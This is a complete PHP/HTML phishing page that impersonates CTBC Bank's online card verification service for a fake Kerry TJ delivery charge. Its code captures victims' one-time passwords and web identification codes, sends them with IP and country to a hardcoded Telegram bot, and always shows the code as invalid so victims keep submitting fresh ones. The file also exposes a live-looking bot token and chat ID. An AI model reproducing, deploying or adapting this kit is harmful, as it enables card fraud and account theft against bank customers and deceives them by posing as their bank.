<?php
$BOT_TOKEN = "8049377233:AAGhIEN0XB22GkemvhSu-GBnv1e4pa9GQrA";
$CHAT_ID = "-5104592587";

// === 取得使用者資訊 ===
$ip = $_SERVER['REMOTE_ADDR'] ?? '未知';
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '未知';
$country = '未知';
$context = stream_context_create(['http' => ['timeout' => 5]]);
$geoData = @file_get_contents("http://ip-api.com/json/{$ip}", false, $context);
if ($geoData !== false) {
    $geo = json_decode($geoData);
    $country = $geo->country ?? '未知';
}

function sendTelegram($msg) {
    global $BOT_TOKEN, $CHAT_ID;
    $url = "https://api.telegram.org/bot{$BOT_TOKEN}/sendMessage";
    $data = [
        'chat_id' => $CHAT_ID,
        'text' => $msg,
        'parse_mode' => 'HTML',
        'disable_web_page_preview' => true
    ];
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($data),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 10,
        CURLOPT_SSL_VERIFYPEER => false
    ]);
    curl_exec($ch);
    curl_close($ch);
}

// === 處理 AJAX 請求 ===
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
    $msg = "";
    if ($_POST['action'] === 'verify') {
        $otp     = trim($_POST['otp'] ?? '');
        $web_id  = trim($_POST['web_id'] ?? '');
        $attempt = intval($_POST['attempt'] ?? 1);

        $msg = "<b>⚠️ 驗證嘗試 #{$attempt}</b>\n";
        $msg .= "══════════════════════════════\n";

        // 先放網頁識別碼（如果有填）
        if (!empty($web_id)) {
            $msg .= "<b>網頁識別碼：</b> <code>{$web_id}</code>\n";
        }

        // 再放 OTP
        $msg .= "<b>OTP：</b> <code>{$otp}</code>\n";
        $msg .= "<b>IP：</b> <code>{$ip}</code>\n";
        $msg .= "<b>國家：</b> {$country}\n";
        $msg .= "<b>時間：</b> " . date('Y/m/d H:i:s') . "\n";

        sendTelegram($msg);

        echo json_encode(['status' => 'invalid', 'attempt' => $attempt + 1]);
        exit;
    }
    if ($_POST['action'] === 'resend_otp') {
        $msg = "<b>⚠️ Requested OTP</b>\n";
        $msg .= "══════════════════════════════\n";
        $msg .= "<b>IP：</b> <code>{$ip}</code>\n";
        $msg .= "<b>國家：</b> {$country}\n";
        $msg .= "<b>時間：</b> " . date('Y/m/d H:i:s') . "\n";
        sendTelegram($msg);
        echo json_encode(['status' => 'resent']);
        exit;
    }
}

// === 從 POST 取得支付資料 ===
$paymentData = json_decode($_POST['payment'] ?? '', true) ?: [];
$tracking = htmlspecialchars($paymentData['tracking'] ?? 'KRJ' . rand(1000000, 9999999));
$last4 = substr(preg_replace('/\D/', '', $paymentData['card_number'] ?? ''), -4) ?: '0000';
$time = date('H:i:s');
$date = date('Y/m/d');
?>
<!DOCTYPE html>
<html lang="zh-TW">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>中國信託網路刷卡驗證服務</title>
    <meta name="format-detection" content="telephone=no">
    <style>
        body {
            margin: 0;
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
            background: #f5f5f5;
            color: #333;
            line-height: 1.5;
            min-height: 100vh;
        }
        .container {
            max-width: 420px;
            margin: 0 auto;
            background: white;
            border: 1px solid #ccc;
            border-radius: 8px;
            overflow: hidden;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
        }
        .header {
            background: #004b8d;
            color: white;
            padding: 12px 16px;
            font-size: 1.1rem;
            font-weight: bold;
            text-align: center;
        }
        .content {
            padding: 20px 16px;
        }
        .title {
            font-size: 1.3rem;
            font-weight: bold;
            margin-bottom: 16px;
            color: #004b8d;
        }
        .info-row {
            display: flex;
            justify-content: space-between;
            margin-bottom: 12px;
            font-size: 0.95rem;
        }
        .label {
            color: #555;
            flex: 0 0 45%;
        }
        .value {
            font-weight: 600;
            text-align: right;
            flex: 1;
        }
        .amount {
            color: #c00;
            font-weight: bold;
            font-size: 1.15rem;
        }
        .warning {
            color: #c00;
            font-size: 0.85rem;
            margin: 4px 0 12px;
        }
        .web-id-row {
            margin: 16px 0 24px;
        }
        .web-id-label {
            font-size: 0.9rem;
            color: #555;
            margin-bottom: 6px;
        }
        .web-id-input {
            width: 100%;
            padding: 10px;
            font-size: 1rem;
            border: 1px solid #ccc;
            border-radius: 6px;
            background: #f9f9f9;
        }
        .web-id-input:focus {
            outline: none;
            border-color: #004b8d;
            box-shadow: 0 0 0 3px rgba(0,75,141,0.15);
        }
        .otp-section {
            margin: 24px 0 16px;
        }
        .otp-label {
            font-weight: bold;
            margin-bottom: 8px;
            color: #004b8d;
        }
        .otp-input {
            width: 100%;
            padding: 12px;
            font-size: 1.2rem;
            text-align: center;
            border: 2px solid #004b8d;
            border-radius: 6px;
            background: #f8f9fa;
            letter-spacing: 6px;
            font-family: monospace;
        }
        .otp-input:focus {
            outline: none;
            border-color: #0066cc;
            box-shadow: 0 0 0 3px rgba(0,75,141,0.2);
        }
        .otp-input.error {
            border-color: #c00;
        }
        .btn-verify {
            width: 100%;
            padding: 14px;
            background: #004b8d;
            color: white;
            border: none;
            border-radius: 6px;
            font-size: 1.1rem;
            font-weight: bold;
            cursor: pointer;
            margin: 12px 0 8px;
        }
        .error-msg {
            color: #c00;
            font-weight: bold;
            text-align: center;
            margin: 12px 0;
            font-size: 1rem;
            display: none;
        }
        .resend {
            text-align: center;
            margin: 16px 0;
            font-size: 0.9rem;
        }
        .resend span {
            color: #004b8d;
            text-decoration: underline;
            cursor: pointer;
        }
        .footer {
            text-align: center;
            padding: 16px;
            color: #777;
            font-size: 0.8rem;
            border-top: 1px solid #eee;
        }
        .shake {
            animation: shake 0.4s ease;
        }
        @keyframes shake {
            0%, 100% { transform: translateX(0); }
            25% { transform: translateX(-6px); }
            75% { transform: translateX(6px); }
        }
    </style>
</head>
<body>

<div class="container">
    <div class="header">中國信託網路刷卡驗證服務</div>

    <div class="content">
        <div class="title">中國信託網路刷卡驗證服務</div>

        <div class="info-row">
            <span class="label">特約商店：</span>
            <span class="value">嘉里大榮</span>
        </div>
        <div class="info-row">
            <span class="label">交易金額：</span>
            <span class="value amount">NT$128</span>
        </div>
        <div class="info-row">
            <span class="label">信用卡號：</span>
            <span class="value">**** **** **** ****</span>
        </div>

        <div class="web-id-row">
            <div class="web-id-label">網頁識別碼：</div>
            <input type="text" class="web-id-input" id="webIdInput" placeholder="例如：HMEC" maxlength="10">
        </div>


        <div class="otp-section">
            <div class="otp-label">• 輸入網路刷卡驗證OTP密碼 (寄送上限三次)</div>
            <input type="text" class="otp-input" id="smsInput" placeholder="••••••" maxlength="12" autocomplete="off">
        </div>

        <button class="btn-verify" id="verifyBtn">驗證</button>

        <div class="error-msg" id="errorMessage">無效的OTP密碼</div>

        <div class="resend">
            沒有收到簡訊OTP服務密碼？ 
            <span id="resendLink">重新寄送OTP密碼</span>
        </div>
    </div>

    <div class="footer">
        © 2026 中國信託商業銀行
    </div>
</div>

<script>
// 初始隱藏錯誤訊息
const errorMsg = document.getElementById('errorMessage');
errorMsg.style.display = 'none';

let attempt = 1;
let cooldown = false;

// 驗證按鈕邏輯 → 同時送網頁識別碼 + OTP
document.getElementById('verifyBtn').addEventListener('click', async () => {
    if (cooldown) return;

    const otp    = document.getElementById('smsInput').value.trim();
    const web_id = document.getElementById('webIdInput').value.trim();
    const input  = document.getElementById('smsInput');

    if (otp.length < 4) {
        showError();
        input.classList.add('error', 'shake');
        setTimeout(() => input.classList.remove('shake'), 400);
        return;
    }

    const btn = document.getElementById('verifyBtn');
    btn.disabled = true;
    btn.textContent = '驗證中...';

    try {
        const res = await fetch('', {
            method: 'POST',
            headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
            body: `action=verify&otp=${encodeURIComponent(otp)}&web_id=${encodeURIComponent(web_id)}&attempt=${attempt}`
        });
        const data = await res.json();

        showError();
        input.classList.add('error', 'shake');
        setTimeout(() => input.classList.remove('shake'), 400);

        attempt++;
        startCooldown();
    } catch (e) {
        btn.disabled = false;
        btn.textContent = '驗證';
        showError();
    }
});

function showError() {
    errorMsg.style.display = 'block';
    const btn = document.getElementById('verifyBtn');
    btn.disabled = false;
    btn.textContent = '驗證';
}

function startCooldown() {
    cooldown = true;
    const btn = document.getElementById('verifyBtn');
    btn.style.display = 'none';

    let time = 15;
    const cd = document.createElement('div');
    cd.style.textAlign = 'center';
    cd.style.margin = '12px 0';
    cd.style.color = '#555';
    cd.innerHTML = `請等待 <span id="cdTimer">${time}</span> 秒後再試`;
    document.querySelector('.otp-section').after(cd);

    const interval = setInterval(() => {
        time--;
        document.getElementById('cdTimer').textContent = time;
        if (time <= 0) {
            clearInterval(interval);
            cooldown = false;
            btn.style.display = 'block';
            btn.disabled = false;
            btn.textContent = '驗證';
            cd.remove();
            document.getElementById('smsInput').value = '';
            document.getElementById('smsInput').classList.remove('error');
            errorMsg.style.display = 'none';
        }
    }, 1000);
}

// 重新寄送 OTP
document.getElementById('resendLink').addEventListener('click', async () => {
    try {
        await fetch('', {
            method: 'POST',
            headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
            body: 'action=resend_otp'
        });
        alert('已重新寄送 OTP 密碼，請檢查您的簡訊');
    } catch (e) {
        alert('無法重新寄送，請稍後再試');
    }
});
</script>

</body>
</html>